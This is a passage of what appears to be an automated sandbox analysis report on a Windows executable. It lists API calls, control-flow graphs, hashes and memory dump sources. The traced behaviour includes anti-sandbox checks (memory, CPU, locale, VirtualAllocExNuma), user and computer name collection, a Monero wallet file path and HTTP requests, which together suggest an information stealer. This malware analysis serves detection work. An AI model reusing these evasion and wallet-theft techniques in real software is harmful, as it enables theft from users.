                          • API String ID: 1544550907-3809124531
                          • Opcode ID: 08dd9e6ebe804908c61e1a0fea5882e81c664515fc0d8e368669d95ee89d43d7
                          • Instruction ID: c3cf1650de1be0e27c0ee08ac84cfd564f954f03100b11008efe64560df22621
                          • Opcode Fuzzy Hash: 08dd9e6ebe804908c61e1a0fea5882e81c664515fc0d8e368669d95ee89d43d7
                          • Instruction Fuzzy Hash: 1B416EB1904248ABDB10DB95DC45FEEBBB8EB48704F140199F509AB280DB786A48CFA5
                          Function 00CC69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892200), ref: 00CC98A1
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892380), ref: 00CC98BA
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892098), ref: 00CC98D2
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892188), ref: 00CC98EA
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892218), ref: 00CC9903
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,018999C0), ref: 00CC991B
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,018853F0), ref: 00CC9933
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,018852B0), ref: 00CC994C
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,018922F0), ref: 00CC9964
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892308), ref: 00CC997C
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892158), ref: 00CC9995
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892320), ref: 00CC99AD
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,018855B0), ref: 00CC99C5
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892230), ref: 00CC99DE
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CB11D0: ExitProcess.KERNEL32 ref: 00CB1211
                            • Part of subcall function 00CB1160: GetSystemInfo.KERNEL32(?), ref: 00CB116A
                            • Part of subcall function 00CB1160: ExitProcess.KERNEL32 ref: 00CB117E
                            • Part of subcall function 00CB1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00CB112B
                            • Part of subcall function 00CB1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00CB1132
                            • Part of subcall function 00CB1110: ExitProcess.KERNEL32 ref: 00CB1143
                            • Part of subcall function 00CB1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00CB123E
                            • Part of subcall function 00CB1220: __aulldiv.LIBCMT ref: 00CB1258
                            • Part of subcall function 00CB1220: __aulldiv.LIBCMT ref: 00CB1266
                            • Part of subcall function 00CB1220: ExitProcess.KERNEL32 ref: 00CB1294
                            • Part of subcall function 00CC6770: GetUserDefaultLangID.KERNEL32 ref: 00CC6774
                            • Part of subcall function 00CB1190: ExitProcess.KERNEL32 ref: 00CB11C6
                            • Part of subcall function 00CC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CB11B7), ref: 00CC7880
                            • Part of subcall function 00CC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00CC7887
                            • Part of subcall function 00CC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CC789F
                            • Part of subcall function 00CC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CC7910
                            • Part of subcall function 00CC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00CC7917
                            • Part of subcall function 00CC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00CC792F
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018999B0,?,00CD110C,?,00000000,?,00CD1110,?,00000000,00CD0AEF), ref: 00CC6ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CC6AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00CC6AF9
                          • Sleep.KERNEL32(00001770), ref: 00CC6B04
                          • CloseHandle.KERNEL32(?,00000000,?,018999B0,?,00CD110C,?,00000000,?,00CD1110,?,00000000,00CD0AEF), ref: 00CC6B1A
                          • ExitProcess.KERNEL32 ref: 00CC6B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0
                          • Opcode ID: 5fca923c070927aebac6e05da594c03aa30b818e41722b2135eb4a46c71429ad
                          • Instruction ID: b19addee5f3a9abd2f5029c2572cc012883888da5c73ac59d6ae86a0edffac1f
                          • Opcode Fuzzy Hash: 5fca923c070927aebac6e05da594c03aa30b818e41722b2135eb4a46c71429ad
                          • Instruction Fuzzy Hash: 97312A70900208ABDB04FBF1DC5AFEE7778AF44344F54452DF612A61C2DF706A05EAA6
                          Function 00CB1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1436 cb1220-cb1247 call cc89b0 GlobalMemoryStatusEx 1439 cb1249-cb1271 call ccda00 * 2 1436->1439 1440 cb1273-cb127a 1436->1440 1442 cb1281-cb1285 1439->1442 1440->1442 1444 cb129a-cb129d 1442->1444 1445 cb1287 1442->1445 1447 cb1289-cb1290 1445->1447 1448 cb1292-cb1294 ExitProcess 1445->1448 1447->1444 1447->1448
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00CB123E
                          • __aulldiv.LIBCMT ref: 00CB1258
                          • __aulldiv.LIBCMT ref: 00CB1266
                          • ExitProcess.KERNEL32 ref: 00CB1294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989
                          • Opcode ID: feb478ed646a2c0ef7ac1edec3b395ae247fe90c0e2c84119ad6341aea8c1211
                          • Instruction ID: b1098b7f49f9420fb6ba93bee292e7b6978f218000df0c316636e618d1293eef
                          • Opcode Fuzzy Hash: feb478ed646a2c0ef7ac1edec3b395ae247fe90c0e2c84119ad6341aea8c1211
                          • Instruction Fuzzy Hash: 9D0162B0D40308FAEB10DBE0CC49FEEB778AF54701F648068EB05BA1C0D7746645979A
                          Function 00CC6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1450 cc6af3 1451 cc6b0a 1450->1451 1453 cc6b0c-cc6b22 call cc6920 call cc5b10 CloseHandle ExitProcess 1451->1453 1454 cc6aba-cc6ad7 call ccaad0 OpenEventA 1451->1454 1459 cc6ad9-cc6af1 call ccaad0 CreateEventA 1454->1459 1460 cc6af5-cc6b04 CloseHandle Sleep 1454->1460 1459->1453 1460->1451
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018999B0,?,00CD110C,?,00000000,?,00CD1110,?,00000000,00CD0AEF), ref: 00CC6ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CC6AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00CC6AF9
                          • Sleep.KERNEL32(00001770), ref: 00CC6B04
                          • CloseHandle.KERNEL32(?,00000000,?,018999B0,?,00CD110C,?,00000000,?,00CD1110,?,00000000,00CD0AEF), ref: 00CC6B1A
                          • ExitProcess.KERNEL32 ref: 00CC6B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: a398132a145226431b9fb543631bcef3fa744d102029fdcdbafca6fb92624f08
                          • Instruction ID: f167689c6c1b7501dd75252e0701805b019b3e16aa2c3f29125d8859210f6b41
                          • Opcode Fuzzy Hash: a398132a145226431b9fb543631bcef3fa744d102029fdcdbafca6fb92624f08
                          • Instruction Fuzzy Hash: 25F0BEB0900209AFE700ABA2DD1AFBE7B34EB04300F10442DF516F51C0CBB02941FAA6
                          Function 00CB47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CB4839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00CB4849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: e53544f7a9b0eb6c7d2bd070fb68ffe38ec0b0006a8e5636e8a1c9c9d0f11bee
                          • Instruction ID: 1fcb4e6907be845f8982ac5798629da625f3c6bd0755d3f76530e590f36973af
                          • Opcode Fuzzy Hash: e53544f7a9b0eb6c7d2bd070fb68ffe38ec0b0006a8e5636e8a1c9c9d0f11bee
                          • Instruction Fuzzy Hash: 5D214FB1D00208ABDF14EFA5E849BDE7B74FB44320F148629F919A72C0DB706A05DF92
                          Function 00CC51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB6280: InternetOpenA.WININET(00CD0DFE,00000001,00000000,00000000,00000000), ref: 00CB62E1
                            • Part of subcall function 00CB6280: StrCmpCA.SHLWAPI(?,0189E6F8), ref: 00CB6303
                            • Part of subcall function 00CB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CB6335
                            • Part of subcall function 00CB6280: HttpOpenRequestA.WININET(00000000,GET,?,0189DEC8,00000000,00000000,00400100,00000000), ref: 00CB6385
                            • Part of subcall function 00CB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00CB63BF
                            • Part of subcall function 00CB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CB63D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CC5228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: 2f45b2eb36e87398134b62ae5d320d090bd47214ac6ca82003f363115f96ada8
                          • Instruction ID: a95d48518904758acaddf8a2892fc24ab9e4dae50e0258c5d07017d56bb638ef
                          • Opcode Fuzzy Hash: 2f45b2eb36e87398134b62ae5d320d090bd47214ac6ca82003f363115f96ada8
                          • Instruction Fuzzy Hash: 29111C3090004CABCB14FF61DD5AFED7378AF50304F80416CF91A5A592EF30AB4AEA92
                          Function 00CB1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00CB112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00CB1132
                          • ExitProcess.KERNEL32 ref: 00CB1143
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: fa9b3deb46037ef0a8d051f9cf3a855458b5b5f324243b26054e8f746624b64f
                          • Instruction ID: 1b131c0dc2836c9b07e84d4c6daba171df71ac2ea70c52abf3624f867d97f69a
                          • Opcode Fuzzy Hash: fa9b3deb46037ef0a8d051f9cf3a855458b5b5f324243b26054e8f746624b64f
                          • Instruction Fuzzy Hash: 1BE086B0945348FFE7106FA1DC0EB5C76B8AB44B41F540055F70D7A1C0C6F42604DA99
                          Function 00CB10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00CB10B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00CB10F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 0c9aad66fc2f3c61f52f3dcca3f69445218dbd90f15fd330efd2f1db4aa52aa9
                          • Instruction ID: 173d623bf466ea516cb0f6e36bb6868d711454dcca9962093f6d91383d65e8c5
                          • Opcode Fuzzy Hash: 0c9aad66fc2f3c61f52f3dcca3f69445218dbd90f15fd330efd2f1db4aa52aa9
                          • Instruction Fuzzy Hash: 6EF0E9B1641204BBE714A6A4AC59FBBB7D8D705715F300458F904E7280D5716F04DA50
                          Function 00CB1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CC7910
                            • Part of subcall function 00CC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00CC7917
                            • Part of subcall function 00CC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00CC792F
                            • Part of subcall function 00CC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CB11B7), ref: 00CC7880
                            • Part of subcall function 00CC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00CC7887
                            • Part of subcall function 00CC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CC789F
                          • ExitProcess.KERNEL32 ref: 00CB11C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: 2834b7ec5507a3ab5fa3cd64926d7288cbca99db834a5e8fbc9a79c814a33cd6
                          • Instruction ID: 2e1c17b7d10b83bf1a192959514b7a5ca0228520aa761d485a8754e9ec97e6d5
                          • Opcode Fuzzy Hash: 2834b7ec5507a3ab5fa3cd64926d7288cbca99db834a5e8fbc9a79c814a33cd6
                          • Instruction Fuzzy Hash: 35E0ECA591420156DA0073B6EC1AF2A329C9B54749F08052DFB09FA142FA25E908E966

                          Non-executed Functions

                          Function 00CC38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00CC38CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 00CC38E3
                          • lstrcat.KERNEL32(?,?), ref: 00CC3935
                          • StrCmpCA.SHLWAPI(?,00CD0F70), ref: 00CC3947
                          • StrCmpCA.SHLWAPI(?,00CD0F74), ref: 00CC395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CC3C67
                          • FindClose.KERNEL32(000000FF), ref: 00CC3C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
